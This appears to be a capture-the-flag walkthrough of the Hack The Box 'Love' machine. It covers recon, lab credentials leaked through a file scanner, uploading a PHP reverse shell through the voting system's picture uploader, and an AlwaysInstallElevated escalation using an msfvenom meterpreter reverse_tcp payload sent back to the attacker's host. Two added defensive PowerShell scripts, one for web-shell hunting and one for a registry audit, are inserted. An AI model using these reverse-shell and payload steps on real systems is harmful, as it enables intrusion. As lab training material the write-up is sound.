In this post, I would like to share a walkthrough of the Love machine.
This room is rated as an EASY machine.
We need to read the following articles to fully understand how to root the machine:
- Penetration-Testing-Grimoire/always-install-elevated.md at master · RackunSec/Penetration-Testing-Grimoire · GitHub
- Always Install Elevated – Penetration Testing Lab (pentestlab.blog)
- Voting System 1.0 Shell Upload ≈ Packet Storm (packetstormsecurity.com)
Once we have started the VPN connection, we can start information gathering on the machine by executing the command nmap -sC -sV -Pn <IP Address>
```text
# Nmap 7.91 scan initiated Sat May 1 17:44:08 2021 as: nmap -sC -sV -oA intial -Pn 10.129.102.135
Nmap scan report for 10.129.102.135
Host is up (0.66s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/http     Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings:
|   DNSStatusRequestTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RTSPRequest, SMBProgNeg, TerminalServerCookie, X11Probe:
|_    Host '10.10.16.13' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 21m20s, deviation: 0s, median: 21m20s
| smb-security-mode:
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-05-01T22:07:08
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/
```
Let's see the website interface.
The website shows only a Voter's ID and Password login, which we don't have at the moment.
Let's check the other ports mentioned in the nmap result. The website on those ports shows a forbidden page.
Oh wait! There's a subdomain mentioned in the nmap result: staging.love.htb
The website redirects to a Free File Scanner interface, which also requires login credentials.
Let’s click on the demo link at the top of website.
Let's scan the URL http://10.10.10.239:5000 with it, and we gain admin credentials:
username: admin password: @LoveIsInTheAir!!!!
We need to use those credentials on http://love.htb/admin
We managed to log into the VotingSystem Dashboard.
Let's do some research on the VotingSystem.
I found a few exploits that we can use on the system itself, as shown in the screenshot above.
However, the exploit didn't work well for me, so I decided to find another way to get a reverse shell back to my machine.
After a while, I found another PHP reverse shell at the website here.
We need to download it and modify the PHP code a little so that the reverse shell connection comes back to us. The modification needs to be done at sh=new Sh('127.0.0.1',9000); replace the address and port with your VPN IP and listening port.
There are two locations that we can use to upload our shell code.
*We need to start our nc listener first.
For the first location, we need to create a position that we will use in this method. Once that is completed, we create a new candidate and upload the shell through the picture uploader.
For the reverse shell to come back, we need to trigger the shell by browsing to love.htb/images and clicking the filename we saved the shell as.
The other location is the admin's profile, where we can upload the shell via the replace picture option.
You will get the shell back if you upload the shell in either place.
We can read the user flag by going to C:\Users\Phoebe\Desktop and using the command "type user.txt".
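As an added, defender-side example that is not part of the original post: a PowerShell sweep of the Apache image-upload folder that flags anything a picture uploader should never have accepted, by script extension, double extension, magic bytes and embedded PHP tag. The folder path is an assumption; point it at the real web root's images directory.

```powershell
# Added example (not from the original post). Hunt for script files parked in an
# image-upload directory on an Apache/PHP host such as the one in this walkthrough.
$UploadDir = 'C:\WEBROOT\images'   # placeholder: set to the real upload folder

$ScriptExtensions = @('.php', '.phtml', '.php3', '.php4', '.php5', '.phar', '.phps')
# Leading bytes of the image formats a picture uploader should accept
$ImageMagic = @{ 'ffd8ff' = 'jpeg'; '89504e47' = 'png'; '47494638' = 'gif' }

function Get-MagicHex([string]$Path, [int]$Count = 4) {
    # Return the first $Count bytes of a file as a lowercase hex string
    $fs = [System.IO.File]::OpenRead($Path)
    try {
        $buf = New-Object byte[] $Count
        $n = $fs.Read($buf, 0, $Count)
        if ($n -eq 0) { return '' }          # empty file: nothing to match
        return (($buf[0..($n - 1)] | ForEach-Object { $_.ToString('x2') }) -join '')
    } finally { $fs.Dispose() }
}

Get-ChildItem -Path $UploadDir -File -Recurse | ForEach-Object {
    $reasons = @()
    $ext = $_.Extension.ToLowerInvariant()
    if ($ScriptExtensions -contains $ext) { $reasons += "script extension $ext" }
    # Double extensions such as shell.php.jpg still reach the PHP handler on some setups
    if ($_.Name -match '\.ph(p\d?|tml|ar|ps)\.') { $reasons += 'double extension' }
    # Content check: does the file actually start like an image?
    $magic = Get-MagicHex -Path $_.FullName
    $isImage = $false
    foreach ($sig in $ImageMagic.Keys) { if ($magic.StartsWith($sig)) { $isImage = $true } }
    if (-not $isImage) { $reasons += "magic bytes '$magic' do not match jpeg/png/gif" }
    # A PHP open tag anywhere in an "image" is a strong web-shell indicator
    if (Select-String -Path $_.FullName -Pattern '<\?php' -Quiet) { $reasons += 'contains <?php tag' }
    if ($reasons.Count -gt 0) {
        [pscustomobject]@{
            File      = $_.FullName
            LastWrite = $_.LastWriteTime
            Reasons   = ($reasons -join '; ')
        }
    }
} | Sort-Object LastWrite -Descending | Format-Table -AutoSize
```

Newest hits are listed first, so a freshly uploaded shell sits at the top; anything flagged should be compared against the upload timestamps in the admin panel and the Apache access log.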
Escalate to Root Privileges Access
We can run winpeas.exe on the victim's machine after transferring the file from our attacking machine. After a while, we find that the "AlwaysInstallElevated" policy is enabled; it is a Windows Installer setting that allows MSI packages to be installed with elevated privileges.
Let's do some research on the "AlwaysInstallElevated" exploit.
We found some exploits that use the Metasploit Framework, so let's start using Metasploit.
Firstly, we need to create a crafted payload with the command msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<Port> -f exe > darknite.exe
We need to transfer it to the victim's machine.
We can execute it by typing the filename, just as shown above.
We configure our Metasploit exploit by running two multi/handler sessions, backgrounding the first one.
We can read the root flag by accessing C:\Users\Administrator\Desktop and using the "type root.txt" command.
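An added example, not from the original post or from winPEAS, that audits and optionally remediates the AlwaysInstallElevated policy winPEAS reported. Windows Installer only honours the setting when the value is 1 in both the HKLM and HKCU policy keys, so the audit reads both hives before calling the host exposed.

```powershell
# Added example (not from the original post): audit AlwaysInstallElevated and
# offer a remediation. The policy key paths below are the documented Windows
# Installer policy locations.
$PolicySubKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
$Hives = @{
    HKLM = "HKLM:\$PolicySubKey"
    HKCU = "HKCU:\$PolicySubKey"
}

function Get-AlwaysInstallElevated {
    # Read the DWORD from each hive; $null means the key or value is absent (safe default)
    $state = @{}
    foreach ($hive in $Hives.Keys) {
        $path  = $Hives[$hive]
        $value = $null
        if (Test-Path $path) {
            $value = (Get-ItemProperty -Path $path -Name AlwaysInstallElevated `
                        -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        $state[$hive] = $value
    }
    [pscustomobject]@{
        HKLM        = $state.HKLM
        HKCU        = $state.HKCU
        # The installer only runs MSIs as SYSTEM for every user when BOTH are 1
        Exploitable = ($state.HKLM -eq 1 -and $state.HKCU -eq 1)
    }
}

function Disable-AlwaysInstallElevated {
    # Sets the value to 0 in every hive where the key exists; supports -WhatIf
    [CmdletBinding(SupportsShouldProcess)]
    param()
    foreach ($path in $Hives.Values) {
        if (Test-Path $path) {
            if ($PSCmdlet.ShouldProcess($path, 'Set AlwaysInstallElevated = 0')) {
                Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
            }
        }
    }
}

$result = Get-AlwaysInstallElevated
$result | Format-List
if ($result.Exploitable) {
    Write-Warning 'AlwaysInstallElevated is 1 in both hives: any local user can install an MSI as SYSTEM.'
    Disable-AlwaysInstallElevated -WhatIf    # drop -WhatIf to remediate (HKLM needs admin rights)
}
```

On a domain-joined host the value is usually pushed by Group Policy (Computer/User Configuration > Administrative Templates > Windows Components > Windows Installer), so fix the GPO as well or the registry change will be reverted at the next refresh.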
Happy Learning Guys!